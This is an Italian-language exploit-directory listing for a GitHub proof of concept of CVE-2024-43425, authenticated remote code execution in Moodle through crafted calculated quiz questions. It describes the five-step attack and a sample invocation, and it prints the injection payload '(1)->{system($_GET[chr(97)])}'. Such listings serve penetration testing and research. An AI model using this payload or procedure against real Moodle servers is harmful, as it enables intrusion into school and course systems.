Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-43425-Poc — Exploit proof-of-concept per CVE-2024-43425, che dimostra l'esecuzione remota di codice autenticata in Moodle tramite il caricamento di domande calcolate malevole. | Kitploit
Strumenti/GitHubGitHub/aninfosec/cve-2024-43425-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubaninfosec/cve-2024-43425-poc

CVE-2024-43425-Poc

Exploit proof-of-concept per CVE-2024-43425, che dimostra l'esecuzione remota di codice autenticata in Moodle tramite il caricamento di domande calcolate malevole.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-43425-Poc

CVE Overview CVE ID: CVE-2024-43425

Descrizione: Moodle consente a un utente autenticato di livello insegnante di caricare una domanda calcolata malevola tramite l'interfaccia dell'editor dei quiz. Impatto: Remote Code Execution (RCE) Causa: Sanitizzazione impropria dei payload matematici all'interno delle domande calcolate, che porta all'iniezione di comandi tramite la procedura guidata del dataset.

##Requisiti:

  • Credenziali di accesso valide
  • Accesso all'interfaccia di modifica dei quiz (di solito un ruolo di insegnante o amministratore)
  • cmid noto (ID modulo quiz) e courseid

##Questo script esegue un attacco in 5 fasi:

Step Descrizione 1️ Recupera il token di login (logintoken) 2️ Effettua il login e stabilisci una MoodleSession valida 3️ Estrai sesskey, ctxid e category dalla pagina di modifica del quiz 4️ Carica una domanda calcolata appositamente creata con un payload RCE 5️ Attiva il payload tramite la pagina della procedura guidata del dataset

##Istruzioni per l'uso

Requisiti: Python 3 Librerie Python: requests, bs4 (BeautifulSoup)

root@kitploit:~
pip3 install requests bs4
root@kitploit:~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'

##Payload utilizzato:

root@kitploit:~
answer[0] = "(1)->{system($_GET[chr(97)])}"
Scarica lo strumento